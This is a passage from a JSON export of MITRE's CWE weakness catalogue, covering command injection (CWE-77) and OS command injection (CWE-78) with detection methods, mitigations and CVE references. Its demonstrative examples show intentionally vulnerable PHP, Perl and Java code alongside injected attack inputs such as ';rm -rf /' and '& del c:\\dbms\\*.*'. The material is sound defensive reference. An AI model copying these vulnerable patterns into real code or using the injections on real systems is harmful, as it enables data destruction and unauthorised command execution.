the output is simply the contents of the file requested:","However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint:","If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0067","Description":"Canonical example of OS command injection. CGI program does not neutralize \\"|\\" metacharacter when invoking a phonebook program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067"},{"Reference":"CVE-2019-12921","Description":"image program allows injection of commands in \\"Magick Vector Graphics (MVG)\\" language.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12921"},{"Reference":"CVE-2020-11698","Description":"anti-spam product allows injection of SNMP commands into confiuration file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Command Injection"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Command injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS34-PL","Entry_Name":"Do not pass untrusted, unsanitized data to a command interpreter","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"136"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"183"}},{"attr":{"@_CAPEC_ID":"248"}},{"attr":{"@_CAPEC_ID":"40"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"75"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 10: Command Injection.&#34; Page 171"}}]},"Notes":{"Note":{"attr":{"@_Type":"Terminology"},"xhtml:p":["The \\"command injection\\" phrase carries different meanings to different people. For some people, it refers to refers to any type of attack that can allow the attacker to execute commands of their own choosing, regardless of how those commands are inserted. The command injection could thus be resultant from another weakness. This usage also includes cases in which the functionality allows the user to specify an entire command, which is then executed; within CWE, this situation might be better regarded as an authorization problem (since an attacker should not be able to specify arbitrary commands.)","Another common usage, which includes CWE-77 and its descendants, involves cases in which the attacker injects separators into the command being constructed."]}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"Command Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into a Control Plane (aka \'Command Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into a Control Plane (\'Command Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in a Command (\'Command Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"78":{"attr":{"@_ID":"78","@_Name":"Improper Neutralization of Special Elements used in an OS Command (\'OS Command Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage.","There are at least two subtypes of OS command injection:","From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system(\\"nslookup [HOSTNAME]\\") to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing.","The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use \\"exec([COMMAND])\\" to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"88","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Shell injection"},{"Term":"Shell metacharacters"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Non-Repudiation"],"Impact":["Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart","Read Files or Directories","Modify Files or Directories","Read Application Data","Modify Application Data","Hide Activities"],"Note":"Attackers could execute unauthorized commands, which could then be used to disable the software, or read and modify data for which the attacker does not have permissions to access directly. Since the targeted application is directly executing the commands instead of the attacker, any malicious activities may appear to come from the application or the application\'s owner."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes.","Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke OS commands, leading to false negatives - especially if the API/library code is not available for analysis."]},"Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If at all possible, use library calls rather than external processes to recreate the desired functionality."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session\'s state instead of sending it out to the client in a hidden form field."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"Phase":"Implementation","Description":"If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line."},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When constructing OS command strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like \\";\\" and \\"&gt;\\" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components.","Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Compilation or Build Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used."]}},{"Phase":"Operation","Strategy":"Sandbox or Jail","Description":"Use runtime policy enforcement to create an allowlist of allowable commands, then prevent use of any command that does not appear in the allowlist. Technologies such as AppArmor are available to do this."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example code intends to take the name of a user and list the contents of that user\'s home directory. It is subject to the first variant of OS command injection.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = $_POST[\\"user\\"];$command = \'ls -l /home/\' . $userName;system($command);","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":";rm -rf /"},{"attr":{"@_Nature":"result"},"xhtml:div":"ls -l /home/;rm -rf /"}],"Body_Text":["The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as:","Which would result in $command being:","Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system.","Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks."]},{"Intro_Text":"This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);$name = param(\'name\');$nslookup = \\"/path/to/nslookup\\";print header;if (open($fh, \\"$nslookup $name|\\")) {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"while (&lt;$fh&gt;) {}close($fh);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print escapeHTML($_);print \\"&lt;br&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":""}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"cwe.mitre.org%20%3B%20/bin/ls%20-l"},{"attr":{"@_Nature":"result"},"xhtml:div":"/path/to/nslookup cwe.mitre.org ; /bin/ls -l"}],"Body_Text":["Suppose an attacker provides a domain name like this:","The \\"%3B\\" sequence decodes to the \\";\\" character, and the %20 decodes to a space. The open() statement would then process a string like this:","As a result, the attacker executes the \\"/bin/ls -l\\" command and gets a list of all the files in the program\'s working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server."]},{"Intro_Text":"The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String script = System.getProperty(\\"SCRIPTNAME\\");if (script != null)","xhtml:br":"","xhtml:div":{"#text":"System.exec(script);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If an attacker has control over this property, then they could modify the property to point to a dangerous program."},{"Intro_Text":"In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through a HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String coordinateTransformLatLonToUTM(String coordinates){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String utmCoords = null;try {}catch(Exception e) {...}return utmCoords;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String latlonCoords = coordinates;Runtime rt = Runtime.getRuntime();Process exec = rt.exec(\\"cmd.exe /C latlon2utm.exe -\\" + latlonCoords);","xhtml:br":["","","","","",""],"xhtml:i":["// process results of coordinate transform","// ..."]}}}}}},"Body_Text":"However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending \'&amp;\' followed by the command for another program to the end of the coordinate string. The \'&amp;\' instructs the Windows operating system to execute another program."},{"attr":{"@_Demonstrative_Example_ID":"DX-28"},"Intro_Text":"The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String btype = request.getParameter(\\"backuptype\\");String cmd = new String(\\"cmd.exe /K \\\\\\"System.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""],"xhtml:div":{"#text":"c:\\\\\\\\util\\\\\\\\rmanDB.bat \\"+btype+\\"&amp;&amp;c:\\\\\\\\utl\\\\\\\\cleanup.bat\\\\\\"\\")","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form \\"&amp; del c:\\\\\\\\dbms\\\\\\\\*.*\\", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0067","Description":"Canonical example of OS command injection. CGI program does not neutralize \\"|\\" metacharacter when invoking a phonebook program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067"},{"Reference":"CVE-2001-1246","Description":"Language interpreter\'s mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246"},{"Reference":"CVE-2002-0061","Description":"Web server allows command execution using \\"|\\" (pipe) character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0061"},{"Reference":"CVE-2003-0041","Description":"FTP client does not filter \\"|\\" from filenames returned by the server, allowing for OS command injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0041"},{"Reference":"CVE-2008-2575","Description":"Shell metacharacters in a filename in a ZIP archive","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2575"},{"Reference":"CVE-2002-1898","Description":"Shell metacharacters in a telnet:// link are not properly handled when the launching application processes the link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1898"},{"Reference":"CVE-2008-4304","Description":"OS command injection through environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4304"},{"Reference":"CVE-2008-4796","Description":"OS command injection through https:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4796"},{"Reference":"CVE-2007-3572","Description":"Chain: incomplete denylist for OS command injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3572"},{"Reference":"CVE-2012-1988","Description":"Product allows remote users to execute arbitrary commands by creating a file 